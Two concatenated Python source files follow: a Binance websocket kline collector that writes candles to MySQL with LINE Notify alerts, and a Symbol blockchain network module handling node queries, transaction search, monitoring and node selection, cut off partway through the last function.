from binance.client import Client
import LineNotify as Notify
# Emit websocket-level trace logging for every frame sent/received.
websocket.enableTrace(True)
### SETTING
# MySQL credentials and the LINE Notify token are loaded once at start-up
# from config.json (resolved relative to the working directory).
file_name = "config.json"
with open(file_name, "r") as f:
    data = json.load(f)
host = data["host"]
port = data["port"]
user = data["user"]
password = data["password"]
Line_Notify_Token = data["Line_token"]
### Write Database
def write_database(symbol, Time, open_price, high_price, low_price, close_price, volume):
    """Insert or update one 5m kline row in the SPOT.<symbol> table.

    If no row exists for `Time`, a new row is inserted; otherwise the
    existing row's OHLCV values are updated in place.
    """
    conn = mysql.connector.connect(host = host, port = port, user = user, password = password, database = "SPOT", auth_plugin = "mysql_native_password")
    try:
        cursor = conn.cursor()
        # NOTE(review): `symbol` is interpolated into the SQL text because a
        # table name cannot be a bound parameter. It originates from the
        # symbol database / websocket feed — verify that source stays trusted
        # (SQL-injection surface). The values themselves are now bound.
        search = '''SELECT * FROM ''' + symbol + ''' WHERE Time = %s'''
        cursor.execute(search, (str(Time),))
        result = cursor.fetchall()
        if len(result) == 0:
            try:
                sql = '''INSERT INTO ''' + symbol + ''' (Time,Open,High,Low,Close,Volume) VALUES (%s,%s,%s,%s,%s,%s)'''
                val = (Time, open_price, high_price, low_price, close_price, volume)
                cursor.execute(sql, val)
                conn.commit()
                loguru.logger.success("Write Database : success")
            # BUG FIX: the original caught json.decoder.JSONDecodeError, which
            # cursor.execute()/commit() can never raise, so real DB failures
            # escaped the handler.
            except mysql.connector.Error:
                loguru.logger.error( symbol + "\a Write Database Error! ")
        else:
            try:
                sql = '''UPDATE ''' + symbol + ''' SET Open=%s, High=%s, Low=%s, Close=%s, Volume=%s WHERE Time=%s'''
                cursor.execute(sql, (open_price, high_price, low_price, close_price, volume, str(Time)))
                conn.commit()
                loguru.logger.success("UPDATE Database : success")
            except mysql.connector.Error:
                loguru.logger.error( symbol + "\a Write Database Error! ")
        print(symbol,Time,open_price,high_price,low_price,close_price,volume)
    finally:
        # BUG FIX: the original never closed the connection, leaking one
        # connection per websocket tick.
        conn.close()
def on_open(ws):
    # Websocket lifecycle callback: connection established.
    loguru.logger.trace(" Connection is opened! ")
def on_message(ws, message):
    """Handle one combined-stream message: parse the kline and persist it.

    Parsing and the DB write run on a short-lived worker thread so the
    websocket read loop is never blocked by MySQL latency.
    """
    def run():
        # Combined-stream payload: the kline fields live under data.k.
        kline = json.loads(message)['data']['k']
        symbol = kline['s']
        Time = kline['t']
        open_price = kline['o']
        high_price = kline['h']
        low_price = kline['l']
        close_price = kline['c']
        volume = kline['v']
        loguru.logger.info(" Pair " + symbol + " Get new KLINES Tick ! ")
        write_database(symbol, Time, open_price, high_price, low_price, close_price, volume)
    # Cleanup: the original also extracted an unused `interval` field and
    # declared run(*args) although no args were ever passed.
    threading.Thread(target=run).start()
def on_error(ws, error):
    # Forward websocket errors to LINE Notify so failures are visible remotely.
    Notify.SendMessageToLineNotify(error,Line_Notify_Token)
def on_close(ws):
    # Websocket lifecycle callback: log and notify that the stream dropped;
    # the top-level while-loop reconnects afterwards.
    loguru.logger.warning(" Connection is closed! ")
    Notify.SendMessageToLineNotify(" Write database program Connection is closed! ",Line_Notify_Token)
# Main loop: rebuild the stream list from the symbol DB, connect to the
# Binance combined stream, and reconnect forever on any failure.
while True:
    try:
        ### Streams
        # Build the combined-stream path: one "<symbol>@kline_5m" entry per
        # symbol stored in the `symbol` database, joined with '/'.
        streams = ""
        conn = mysql.connector.connect(host = host, port = port, user = user, password = password, database = "symbol", auth_plugin = "mysql_native_password" )
        cursor = conn.cursor()
        sql_read_data = "SELECT * FROM SPOT"
        cursor.execute(sql_read_data)
        result = cursor.fetchall()
        conn.close()
        for i in range(len(result)):
            a = result[i][0]
            # All but the last entry get a trailing '/' separator.
            if i != int(len(result)-1):
                streams = streams + str(a.lower()) + "@kline_5m/"
            if i == int(len(result)-1):
                streams = streams + str(a.lower()) + "@kline_5m"
        ### Binance Websocket API
        socket = "wss://stream.binance.com/stream?streams=" + streams
        print(socket)
        ws = websocket.WebSocketApp(socket, on_open=on_open, on_message=on_message, on_error = on_error, on_close=on_close)
        # Blocks until the connection drops; the surrounding loop reconnects.
        ws.run_forever()
    except Exception as error:
        # Any failure (DB read or websocket) is reported via LINE, then retried.
        print("Error!!!")
        Notify.SendMessageToLineNotify(error,Line_Notify_Token)
|
network.py | import asyncio
import datetime
import json
import logging
import multiprocessing
import threading
import time
import re
from base64 import b32encode
from binascii import unhexlify
from http import HTTPStatus
from typing import Optional, Union, List, Callable, Dict
from urllib.parse import urlparse
from requests.exceptions import RequestException
import requests
import websockets
from nempy.sym.constants import BlockchainStatuses, EPOCH_TIME_TESTNET, EPOCH_TIME_MAINNET, NetworkType, \
TransactionTypes, AccountValidationState
from pydantic import BaseModel, StrictInt, StrictFloat
from symbolchain.core.CryptoTypes import Hash256
from symbolchain.core.facade.SymFacade import SymFacade
from tabulate import tabulate
from websockets import exceptions
from . import ed25519, constants, config
from .constants import TransactionStatus
logger = logging.getLogger(__name__)
class SymbolNetworkException(Exception):
    """Is one exception for the convenience of working with the blockchain network"""
    codes = {
        'ResourceNotFound': 404,
        'InvalidAddress': 409,
        'InvalidArgument': 409,
        'InvalidContent': 400,
        'Internal': 500,
    }

    def __init__(self, code, message):
        # `code` is the symbolic error name reported by the node; map it to
        # an HTTP-style status (None when the name is unknown).
        self.name = code
        self.code = SymbolNetworkException.codes.get(code)
        self.message = message
        Exception.__init__(self, '{} - {}'.format(self.code, self.name), message)
def url_validation(url):
    """Validate `url` against django's URL regex.

    Raise ValueError if the url is not valid; return None otherwise.
    """
    regex = re.compile(
        r'^(?:http|ftp)s?://'  # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'  # domain...
        r'localhost|'  # localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'  # ...or ip
        r'(?::\d+)?'  # optional port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    if regex.match(url) is None:
        raise ValueError(f'`{url}` is not a valid URL')
def mosaic_id_to_name_n_real(mosaic_id: str, amount: int) -> Dict[str, float]:
    """
    Converts mosaic identifiers to names and integer numbers to real numbers.

    Parameters
    ----------
    mosaic_id
        Mosaic ID as string
    amount
        Absolute mosaic units (relative amount multiplied by 10^divisibility).

    Returns
    -------
    Dict[str, float]
        A dictionary with a name and a real amount value, e.g.
        ```py
        {'id': 'symbol.xym', 'amount': 1.1}
        ```
    """
    if not isinstance(amount, int):
        raise TypeError('To avoid confusion, automatic conversion to integer is prohibited')
    divisibility = get_divisibility(mosaic_id)
    divider = 10 ** int(divisibility)
    names_info = get_mosaic_names(mosaic_id)
    names = names_info['mosaicNames'][0]['names']
    # Fall back to the raw ID when the mosaic has no registered namespace name.
    name = names[0] if len(names) > 0 else mosaic_id
    return {'id': name, 'amount': float(amount / divider)}
class Meta(BaseModel):
    """Transaction meta information"""
    # Block height the transaction is recorded at (shown as 'Height:' below).
    height: int
    # Transaction hash, used to build the explorer URL.
    hash: str
    # Merkle component hash of the transaction.
    merkleComponentHash: str
    # Index of the transaction within its block.
    index: int
class MosaicInfo(BaseModel):
    """Mosaic information in a transaction"""
    # Mosaic ID, or its readable name after TransactionInfo.humanization().
    id: str
    # Absolute (int) amount, or real (float) after humanization.
    amount: Union[StrictInt, StrictFloat]

    def __str__(self):
        # Rendered as "<amount>(<id>)".
        return f'{self.amount}({self.id})'
class TransactionInfo(BaseModel):
    """Contains information about transactions of the blockchain network"""
    size: int
    signature: str
    signerPublicKey: str
    version: int
    network: int
    # Numeric type from the node; humanization() replaces it with the
    # TransactionTypes member name.
    type: Union[int, str]
    maxFee: int
    # Raw deadline from the node; humanization() converts it to a datetime.
    deadline: Union[int, datetime.datetime]
    recipientAddress: str
    message: Optional[str]
    # Derived from signerPublicKey in humanization(); not in raw node data.
    signer_address: Optional[str]
    mosaics: List[MosaicInfo]

    def humanization(self):
        """Converts information from the blockchain into a readable form"""
        self.deadline = Timing().deadline_to_date(self.deadline)
        if self.message is not None:
            # Drop the first payload byte before decoding — presumably a
            # message-type prefix; confirm against the Symbol message format.
            self.message = unhexlify(self.message)[1:].decode('utf-8')
        # Hex-encoded address -> base32, dropping the final character
        # (the base32 padding '=').
        self.recipientAddress = b32encode(unhexlify(self.recipientAddress)).decode('utf-8')[:-1]
        self.mosaics = [MosaicInfo(**mosaic_id_to_name_n_real(mosaic.id, mosaic.amount)) for mosaic in self.mosaics]
        self.type = TransactionTypes.get_type_by_id(self.type).name
        # Recompute the sender address from the public key for the current network.
        facade = SymFacade(node_selector.network_type.value)
        self.signer_address = str(facade.network.public_key_to_address(Hash256(self.signerPublicKey)))
class TransactionResponse(BaseModel):
    """One transaction as returned by the node, plus an optional status."""
    id: str
    meta: Meta
    transaction: TransactionInfo
    # NOTE(review): presumably set by the caller after the lookup (it is not
    # part of Meta/TransactionInfo) — confirm against the callers.
    status: Optional[str]

    def __str__(self):
        """Render the transaction as a human-readable property table."""
        # Testnet addresses start with 'T'; pick the matching block explorer.
        if self.transaction.signer_address.startswith('T'):
            test_net_explorer = 'http://explorer.testnet.symboldev.network/transactions/'
        else:
            test_net_explorer = 'http://explorer.symbolblockchain.io/transactions/'
        prepare = list()
        mosaics = [str(mosaic) for mosaic in self.transaction.mosaics]
        mosaics = '\n'.join(mosaics)
        prepare.append(['Type:', self.transaction.type.title()])
        prepare.append(['Status:', self.status.title()])
        prepare.append(['Hash:', f'{test_net_explorer}{self.meta.hash}'])
        # maxFee is in absolute units; dividing by 10^6 yields whole XYM.
        prepare.append(['Paid Fee:', f'{self.transaction.maxFee / 1000000}(XYM)'])
        prepare.append(['Height:', self.meta.height])
        prepare.append(['Deadline:', self.transaction.deadline])
        prepare.append(['Signature:', self.transaction.signature])
        prepare.append(['Signer Public Key:', self.transaction.signerPublicKey])
        prepare.append(['From:', self.transaction.signer_address])
        prepare.append(['To:', self.transaction.recipientAddress])
        prepare.append(['Mosaic:', mosaics])
        prepare.append(['Message:', self.transaction.message])
        table = tabulate(prepare, headers=['Property', 'Value'], tablefmt='grid')
        return table
def send_transaction(payload: bytes) -> bool:
    """Announces a transaction to the network"""
    headers = {'Content-type': 'application/json'}
    try:
        answer = requests.put(f'{node_selector.url}/transactions', data=payload, headers=headers, timeout=10)
        # The node acknowledges an announced transaction with 202 ACCEPTED.
        if answer.status_code != HTTPStatus.ACCEPTED:
            raise SymbolNetworkException(**answer.json())
    except (RequestException, SymbolNetworkException) as e:
        logger.exception(e)
        return False
    return True
def get_mosaic_names(mosaics_ids: Union[list, str]) -> Optional[dict]:
    """
    Get readable names for a set of mosaics.

    Parameters
    ----------
    mosaics_ids
        IDs of mosaic as list or str if there is only one mosaic

    Returns
    -------
    Optional[Dict[str, list]]
        dict of mosaics. For example:
        ```py
        {"mosaicNames": [{"mosaicId": "091F837E059AE13C", "names": ["symbol.xym"]}]}
        ```
    """
    if isinstance(mosaics_ids, str):
        mosaics_ids = [mosaics_ids]
    try:
        # Validate every ID up front so we fail before any network traffic.
        for mosaic_id in mosaics_ids:
            if not ed25519.check_hex(mosaic_id, constants.HexSequenceSizes.MOSAIC_ID):
                raise SymbolNetworkException('InvalidArgument', f'mosaicId `{mosaic_id}` has an invalid format')
        answer = requests.post(f'{node_selector.url}/namespaces/mosaic/names',
                               json={'mosaicIds': mosaics_ids},
                               headers={'Content-type': 'application/json'},
                               timeout=10)
        if answer.status_code != HTTPStatus.OK:
            raise SymbolNetworkException(**answer.json())
    except (RequestException, SymbolNetworkException) as e:
        logger.exception(e)
        raise
    return answer.json()
def get_accounts_info(address: str) -> Optional[dict]:
    """Return account information for `address` from the selected node.

    Returns the parsed JSON on success, None when the node answers with a
    non-OK status.  Raises SymbolNetworkException for a malformed address
    and RequestException for transport failures (both logged first).
    """
    try:
        if (avs := ed25519.check_address(address)) != AccountValidationState.OK:
            raise SymbolNetworkException('InvalidAddress', f'Incorrect account address: `{address}`: {avs}')
        endpoint = f'{node_selector.url}/accounts/{address}'
        # timeout added for consistency with every other node request in this module
        answer = requests.get(endpoint, timeout=10)
        if answer.status_code != HTTPStatus.OK:
            return None
    except (RequestException, SymbolNetworkException) as e:
        # the two previously identical handlers are merged into one
        logger.exception(e)
        raise
    else:
        return answer.json()
def search_transactions(address: Optional[str] = None,
                        recipient_address: Optional[str] = None,
                        signer_public_key: Optional[str] = None,
                        height: Optional[int] = None,
                        from_height: Optional[int] = None,
                        to_height: Optional[str] = None,
                        from_transfer_amount: Optional[str] = None,
                        to_transfer_amount: Optional[str] = None,
                        type: int = 16724,
                        embedded: bool = False,
                        transfer_mosaic_id: Optional[str] = None,
                        page_size: int = 10,
                        page_number: int = 1,
                        offset: Optional[str] = None,
                        order: str = 'desc',
                        transaction_status: TransactionStatus = TransactionStatus.CONFIRMED_ADDED
                        ) -> Optional[list]:
    """Search the node for transactions matching the given filters.

    All filter arguments are optional; unset (None) filters are omitted
    from the query.  `type` defaults to 16724 (0x4154) — presumably the
    transfer transaction type; confirm against the Symbol schema.
    `transaction_status` selects the endpoint (confirmed / unconfirmed /
    partial via its `.value`).

    Returns a list of TransactionResponse objects, each humanized in place.
    Logs and re-raises RequestException / SymbolNetworkException.
    """
    # The REST API expects camelCase query parameter names.
    params = {
        'address': address,
        'recipientAddress': recipient_address,
        'signerPublicKey': signer_public_key,
        'height': height,
        'fromHeight': from_height,
        'toHeight': to_height,
        'fromTransferAmount': from_transfer_amount,
        'toTransferAmount': to_transfer_amount,
        'type': type,
        'embedded': str(embedded).lower(),
        'transferMosaicId': transfer_mosaic_id,
        'pageSize': page_size,
        'pageNumber': page_number,
        'offset': offset,
        'order': order
    }
    # Drop unset filters so they are not serialized as the string 'None'.
    payload = {key: val for key, val in params.items() if val is not None}
    endpoint = f'{node_selector.url}/transactions/{transaction_status.value}'
    try:
        answer = requests.get(endpoint, params=payload)
        if answer.status_code != HTTPStatus.OK:
            raise SymbolNetworkException(**answer.json())
    except RequestException as e:
        logger.exception(e)
        raise
    except SymbolNetworkException as e:
        logger.exception(e)
        raise
    transactions = answer.json()
    transactions_response = []
    for transaction in transactions['data']:
        # Mosaics are lifted out first so TransactionInfo receives typed MosaicInfo objects.
        mosaics = [MosaicInfo(id=mosaic['id'], amount=int(mosaic['amount'])) for mosaic in transaction['transaction']['mosaics']]
        del(transaction['transaction']['mosaics'])
        _transaction = TransactionResponse(id=transaction['id'],
                                           meta=Meta(**transaction['meta']),
                                           transaction=TransactionInfo(mosaics=mosaics, **transaction['transaction'])
                                           )
        _transaction.status = transaction_status.value
        transactions_response.append(_transaction)
        # Convert raw fields (addresses, deadlines, amounts) into readable form.
        _transaction.transaction.humanization()
    return transactions_response
def get_namespace_info(namespace_id: str) -> Optional[dict]:
    """Fetch namespace information by namespace ID.

    Returns the parsed JSON on success, an empty dict when the namespace
    does not exist (HTTP 404), and None on any other failure.
    """
    try:
        response = requests.get(f'{node_selector.url}/namespaces/{namespace_id}')
    except Exception as e:
        logger.error(e)
        return None
    if response.status_code == HTTPStatus.OK:
        return response.json()
    logger.error(response.text)
    if response.status_code == HTTPStatus.NOT_FOUND:
        logger.error(f'Invalid namespace ID `{namespace_id}`')
        return {}
    return None
def check_transaction_state(transaction_hash):
    """Determine the current status of a transaction by its hash.

    Polls the node's `confirmed`, `unconfirmed` and `partial` endpoints in
    that order and returns the matching TransactionStatus for the first
    endpoint that knows the hash; TransactionStatus.NOT_FOUND when none do.

    Logs and re-raises transport failures and non-404 protocol errors.
    """
    timeout = 10
    # Endpoint name and the status it maps to, kept together in one place.
    check_order = {
        'confirmed': TransactionStatus.CONFIRMED_ADDED,
        'unconfirmed': TransactionStatus.UNCONFIRMED_ADDED,
        'partial': TransactionStatus.PARTIAL_ADDED,
    }
    for checker, checker_status in check_order.items():
        endpoint = f'{node_selector.url}/transactions/{checker}/{transaction_hash}'
        try:
            answer = requests.get(endpoint, timeout=timeout)
            # HTTPStatus.OK instead of the magic number 200 (consistent with the module)
            if answer.status_code != HTTPStatus.OK:
                raise SymbolNetworkException(**answer.json())
        except (RequestException, SymbolNetworkException) as e:
            if isinstance(e, SymbolNetworkException) and e.code == 404:
                # BUG FIX: previously a 404 returned NOT_FOUND immediately,
                # which made the 'unconfirmed' and 'partial' checks unreachable.
                # Fall through to the next endpoint instead.
                continue
            logger.exception(e)
            raise
        else:
            return checker_status
    return TransactionStatus.NOT_FOUND
def get_network_properties():
    """Return the node's network properties as parsed JSON.

    Raises requests.HTTPError (via raise_for_status) on 4xx/5xx answers.
    """
    response = requests.get(f'{node_selector.url}/network/properties')
    if response.status_code == HTTPStatus.OK:
        return response.json()
    response.raise_for_status()
def get_node_network():
    """Identify which network the selected node belongs to.

    Compares the node's generation hash seed against the known test-net and
    main-net seeds.  Returns NetworkType.TEST_NET / NetworkType.MAIN_NET, or
    None for an unrecognized seed.  Raises on transport failures and on
    4xx/5xx answers.
    """
    try:
        response = requests.get(f'{node_selector.url}/node/info')
    except RequestException as e:
        logger.exception(e)
        raise
    if response.status_code == HTTPStatus.OK:
        seed = response.json()['networkGenerationHashSeed']
        if seed == constants.NETWORK_GENERATION_HASH_SEED_TEST:
            return NetworkType.TEST_NET
        if seed == constants.NETWORK_GENERATION_HASH_SEED_PUBLIC:
            return NetworkType.MAIN_NET
        return None
    response.raise_for_status()
def get_block_information(height: int):
    """Return block information for the given chain height as parsed JSON.

    Raises requests.HTTPError (via raise_for_status) on 4xx/5xx answers.
    """
    response = requests.get(f'{node_selector.url}/blocks/{height}')
    if response.status_code == HTTPStatus.OK:
        return response.json()
    response.raise_for_status()
def get_fee_multipliers():
    """Return the node's transaction fee multipliers, or None on any failure."""
    try:
        response = requests.get(f'{node_selector.url}/network/fees/transaction')
    except RequestException as e:
        logger.exception(e)
        return None
    if response.status_code == HTTPStatus.OK:
        return response.json()
    return None
def get_divisibility(mosaic_id: str) -> Optional[int]:
    """Return the divisibility (number of decimal places) of a mosaic.

    Raises SymbolNetworkException for an invalid ID or a protocol error and
    RequestException for transport failures; both are logged before re-raising.
    """
    try:
        if not ed25519.check_hex(mosaic_id, constants.HexSequenceSizes.MOSAIC_ID):
            raise SymbolNetworkException('InvalidArgument', f'mosaicId `{mosaic_id}` has an invalid format')
        # timeout added for consistency with the other node requests in this module
        answer = requests.get(f'{node_selector.url}/mosaics/{mosaic_id}', timeout=10)
        if answer.status_code != HTTPStatus.OK:
            raise SymbolNetworkException(**answer.json())
        node_info = answer.json()
        return int(node_info['mosaic']['divisibility'])
    except (RequestException, SymbolNetworkException) as e:
        # the two previously identical handlers are merged into one
        logger.exception(e)
        raise
def get_divisibilities(n_pages: int = 0):
    """Build a {mosaic_id: divisibility} map by paging through /mosaics.

    n_pages limits how many pages (of 100 mosaics each) are fetched;
    0 means "fetch every page".

    Returns the accumulated dict, or None on a network/protocol error.
    """
    mosaics = {}
    payload = {'pageSize': 100}
    page_count = 1
    while True:
        try:
            answer = requests.get(f'{node_selector.url}/mosaics', params=payload)
        except Exception as e:
            logger.error(e)
            return None
        if answer.status_code == HTTPStatus.OK:
            page_data = answer.json()['data']
            if len(page_data) == 0:
                return mosaics
            for page in page_data:
                mosaics[page['mosaic']['id']] = page['mosaic']['divisibility']
            # continue the next request from the last record of this page
            payload['offset'] = page_data[-1]['id']
            if n_pages:
                page_count += 1
                # BUG FIX: `page_count > n_pages` was previously also tested when
                # n_pages == 0 (1 > 0 is true), so "fetch everything" mode
                # stopped after a single page.
                if page_count > n_pages:
                    return mosaics
        else:
            # BUG FIX: a non-OK answer previously retried the same request forever
            logger.error(answer.text)
            return None
def get_balance(address: str) -> Optional[dict]:
    """Return {mosaic_id: amount} for an account, scaled by each mosaic's divisibility.

    Unknown accounts (no info available, or a 404 from the node) yield an
    empty dict.  Other network/protocol errors are re-raised.
    """
    try:
        info = get_accounts_info(address)
        if info is None:
            return {}
        balance = {}
        for mosaic in info['account']['mosaics']:
            scale = 10 ** get_divisibility(mosaic['id'])
            balance[mosaic['id']] = int(mosaic['amount']) / scale
        return balance
    except (SymbolNetworkException, RequestException) as e:
        if isinstance(e, SymbolNetworkException) and e.code == 404:
            return {}
        raise
class Monitor:
    """Allows you to subscribe to events on the blockchain network"""
    # Topic -> required qualifier: address-scoped topics are subscribed per
    # account; the block topics (None) are global.
    where_to_subscribe = {
        'confirmedAdded': 'address',
        'unconfirmedAdded': 'address',
        'unconfirmedRemoved': 'address',
        'partialAdded': 'address',
        'partialRemoved': 'address',
        'cosignature': 'address',
        'status': 'address',
        'block': None,
        'finalizedBlock': None
    }

    def __init__(self,
                 url: str,
                 subscribers: List[str],
                 formatting: bool = False,
                 log: str = '',
                 callback: Optional[Callable] = None):
        """Open a websocket to the node and start listening immediately.

        url: REST node URL (http://host:port); converted to ws://host:port/ws.
        subscribers: topic strings to subscribe to (see where_to_subscribe).
        formatting: pretty-print received JSON before printing/logging.
        log: path of a file to append every received message to ('' disables).
        callback: if given, each message (as a dict) is handed to it and the
            print/log path is skipped.

        NOTE: the constructor BLOCKS — it runs the event loop until the
        websocket connection ends.
        """
        self.url = url
        self.subscribers = subscribers
        self.formatting = formatting
        self.log = log
        self.callback = callback
        loop = asyncio.get_event_loop()
        loop.run_until_complete(self.monitoring())

    async def monitoring(self):
        """Subscribe to all requested topics and consume messages forever.

        Re-raises websockets.exceptions.WebSocketException after logging it.
        """
        result = urlparse(self.url)
        url = f"ws://{result.hostname}:{result.port}/ws"
        print(f'MONITORING: {url}')
        try:
            async with websockets.connect(url) as ws:
                # The first frame from the node carries the connection UID
                # that must accompany every subscribe request.
                response = json.loads(await ws.recv())
                print(f'UID: {response["uid"]}')
                if 'uid' in response:
                    prepare = []
                    for subscriber in self.subscribers:
                        added = json.dumps({"uid": response["uid"], "subscribe": f"{subscriber}"})
                        await ws.send(added)
                        # print(f'Subscribed to: {subscriber}')
                        prepare.append([subscriber])
                    table = tabulate(prepare, headers=['Subscribers'], tablefmt='grid')
                    print(table)
                    print('Listening... `Ctrl+C` for abort')
                    while True:
                        res = await ws.recv()
                        if self.formatting:
                            res = json.dumps(json.loads(res), indent=4)
                        if self.callback is not None:
                            # The callback consumes the message; skip print/log below.
                            self.callback(json.loads(res))
                            continue
                        print(res)
                        if self.log:
                            with open(self.log, 'a+') as f:
                                res += '\n'
                                f.write(res)
        except exceptions.WebSocketException as e:
            logger.exception(e)
            raise
class Timing:
    """Works with network time.

    Converts between wall-clock time and the millisecond offsets from the
    network epoch that Symbol transactions use for deadlines.
    """

    def __init__(self, network_type: Optional[NetworkType] = None):
        """Select the epoch for `network_type` (defaults to the node's network).

        Raises EnvironmentError when the network type cannot be determined.
        """
        if network_type is None:
            network_type = node_selector.network_type
        if network_type == NetworkType.TEST_NET:
            self.epoch_time = EPOCH_TIME_TESTNET
        elif network_type == NetworkType.MAIN_NET:
            self.epoch_time = EPOCH_TIME_MAINNET
        else:
            raise EnvironmentError('It is not possible to determine the type of network')

    def calc_deadline(self, days: float = 0, seconds: float = 0, milliseconds: float = 0,
                      minutes: float = 0, hours: float = 0, weeks: float = 0) -> int:
        """Return a transaction deadline: milliseconds since the network epoch.

        The added time must be strictly positive; raises TimeoutError otherwise.
        """
        if days + seconds + milliseconds + minutes + hours + weeks <= 0:
            raise TimeoutError('Added time must be positive otherwise the transaction will not have time to process')
        now = datetime.datetime.now(tz=datetime.timezone.utc)
        td = now - self.epoch_time
        td += datetime.timedelta(days=days, seconds=seconds,
                                 milliseconds=milliseconds, minutes=minutes,
                                 hours=hours, weeks=weeks)
        return int(td.total_seconds() * 1000)

    def deadline_to_date(self, deadline: int, is_local: bool = False) -> datetime.datetime:
        """Convert a deadline (ms since the network epoch) to a datetime.

        is_local: shift the result from UTC into the local timezone.

        BUG FIX: the return annotation previously referenced the `datetime`
        module instead of the `datetime.datetime` class.
        """
        def utc2local(utc):
            # Offset between the local wall clock and UTC for this timestamp.
            utc_epoch = time.mktime(utc.timetuple())
            offset = datetime.datetime.fromtimestamp(utc_epoch) - datetime.datetime.utcfromtimestamp(utc_epoch)
            return utc + offset

        deadline = int(deadline)
        epoch_timestamp = datetime.datetime.timestamp(self.epoch_time)
        deadline_date_utc = datetime.datetime.utcfromtimestamp(epoch_timestamp + deadline / 1000)
        if is_local:
            return utc2local(deadline_date_utc)
        return deadline_date_utc
class Thread:
    """A helper class that owns a worker thread and the events used to
    start and stop it by signals."""

    def __init__(self):
        # The worker and its control events are created lazily in start().
        self.stop_event: Optional[threading.Event] = None
        self.thread: Optional[threading.Thread] = None
        self.is_started = False
        self.updated = threading.Event()

    def stop(self):
        """Signal the worker to stop and wait for it to finish."""
        if self.thread is None or not self.thread.is_alive():
            return
        self.stop_event.set()
        self.thread.join()
        self.is_started = False
        logger.debug(f'The node actualization thread {self.thread.name} has been stopped.')

    def start(self, func: Callable, interval: int = 3600):
        """Launch `func(interval=, stop_event=, updated=)` in a daemon thread.

        Returns self so calls can be chained (e.g. `.start(...).wait()`).
        """
        self.is_started = True
        self.stop_event = threading.Event()
        self.updated = threading.Event()
        self.thread = threading.Thread(target=func,
                                       kwargs={'interval': interval,
                                               'stop_event': self.stop_event,
                                               'updated': self.updated},
                                       daemon=True)
        self.thread.start()
        logger.debug(f'New actualizer thread started: {self.thread.name}')
        return self

    def wait(self):
        """Block until the worker signals `updated` (at most 60 seconds)."""
        if not self.updated.wait(60):
            raise RuntimeError('Very long waiting time for node selection')
class NodeSelector:
    """Works with a list of nodes in both the main and test networks.
    Offline finds the best connection options and makes adjustments if conditions change.
    Also allows you to add connections manually.
    """
    # Currently selected node URL and the candidate list.
    _URL: Optional[str] = None
    _URLs: Optional[list] = None
    # True while a (re)election is in progress; readers of `url` spin-wait on it.
    is_elections: bool = False
    _network_type: NetworkType = NetworkType.TEST_NET

    def __init__(self, node_urls: Union[List[str], str]):
        # Background thread that periodically re-elects the best node.
        self.thread = Thread()
        self.url = node_urls

    @property
    def url(self):
        # Block until any in-flight election finishes, then return the winner.
        while self.is_elections:
            time.sleep(0.1)
        return self._URL

    @url.setter
    def url(self, urls: Union[list, str]):
        # Replace the candidate list; with more than one URL an election
        # thread is started and this setter waits for its first result.
        self.is_elections = True
        self.thread.stop()
        if isinstance(urls, str):
            urls = [urls]
        for url in urls:
            url_validation(url)
        self._URLs = urls
        if len(self._URLs) == 1:
            self._URL = self._URLs[0]  # setting a single URL value
            logger.debug(f'Installed node: {self._URL}')
        else:
            self.thread.start(self.node_actualizer, interval=3600).wait()
        self.is_elections = False

    def node_actualizer(self, interval, stop_event, updated):
        # Worker loop: re-elect a node every `interval` seconds until stopped.
        while True:
            self.reelection_node()
            updated.set()
            event_is_set = stop_event.wait(interval)
            if event_is_set:
                break

    def reelection_node(self):
        # Pick the best node: within 97% of the max chain height, healthy,
        # and with the lowest measured latency.
        # The worker thread needs its own event loop for the async latency probes.
        asyncio.set_event_loop(asyncio.new_event_loop())
        logger.debug('Node reselecting...')
        heights = [NodeSelector.get_height(url) for url in self._URLs]
        max_height = max(heights)
        heights_filter = [True if height >= max_height * 0.97 else False for height in heights]
        # filtered by block height - 97%
        filtered_by_height = [url for i, url in enumerate(self._URLs) if heights_filter[i]]
        urls_p_h = {url: (NodeSelector.ping(url), NodeSelector.simple_health(url)) for url in filtered_by_height}
        # Remove non-working nodes from the dict
        working = {key: val for key, val in urls_p_h.items() if val[1]}
        # Sort the healthy nodes by ping (ascending) and take the fastest.
        _sorted_URLs = [k for k, v in sorted(working.items(), key=lambda item: item[1][0])]
        new_url = _sorted_URLs[0] if len(_sorted_URLs) > 0 else None
        if new_url != self._URL and self._URL is not None:
            logger.warning(f'Reselection node: {self._URL} -> {new_url}')
        if new_url is None:
            logger.error('It was not possible to select the current node from the list of available ones')
        self._URL = new_url
        logger.debug(f'Selected node: {self._URL}')

    @property
    def network_type(self):
        # The NetworkType this selector is currently configured for.
        return self._network_type

    @network_type.setter
    def network_type(self, network_type):
        # Switching networks swaps the candidate list to the matching config
        # (which restarts the election via the `url` setter).
        if network_type == self.network_type:
            return
        self._network_type = network_type
        if self._network_type == NetworkType.MAIN_NET:
            logger.debug('Switch to MAIN network')
            self.url = config.MAIN_NODE_URLs
        elif self._network_type == NetworkType.TEST_NET:
            logger.debug('Switch to TEST network')
            self.url = config.TEST_NODE_URLs
        else:
            raise TypeError('Unknown network type')

    @staticmethod
    def health(url) -> BlockchainStatuses:
        """
        Returns the statuses of node services
        Parameters
        ----------
        url
            URL node in the form of http://ngl-dual-001.testnet.symboldev.network:3000
        Returns
        -------
        BlockchainStatuses
            The statuses of node services
            ```py
            BlockchainStatuses.DB_FAILURE
            BlockchainStatuses.NO_NODES_AVAILABLE
            BlockchainStatuses.NOT_INITIALIZED
            BlockchainStatuses.REST_FAILURE
            BlockchainStatuses.OK
            BlockchainStatuses.UNKNOWN
            ```
        """
        if url is None:
            return BlockchainStatuses.NO_NODES_AVAILABLE
        try:
            answer = requests.get(f'{url}/node/health', timeout=1)
        except Exception as e:
            logger.exception(e)
            return BlockchainStatuses.REST_FAILURE
        if answer.status_code == HTTPStatus.OK:
            node_info = answer.json()
            if node_info['status']['apiNode'] == 'up' and node_info['status']['db'] == 'up':
                return BlockchainStatuses.OK
            if node_info['status']['apiNode'] == 'down':
                return BlockchainStatuses.NODE_FAILURE
            if node_info['status']['db'] == 'down':
                return BlockchainStatuses.DB_FAILURE
        return BlockchainStatuses.UNKNOWN

    @staticmethod
    def simple_health(url) -> bool:
        # Boolean wrapper over health(): True only for BlockchainStatuses.OK.
        health_status = NodeSelector.health(url)
        if health_status == BlockchainStatuses.OK:
            return True
        return False

    @staticmethod
    def get_height(url) -> int:
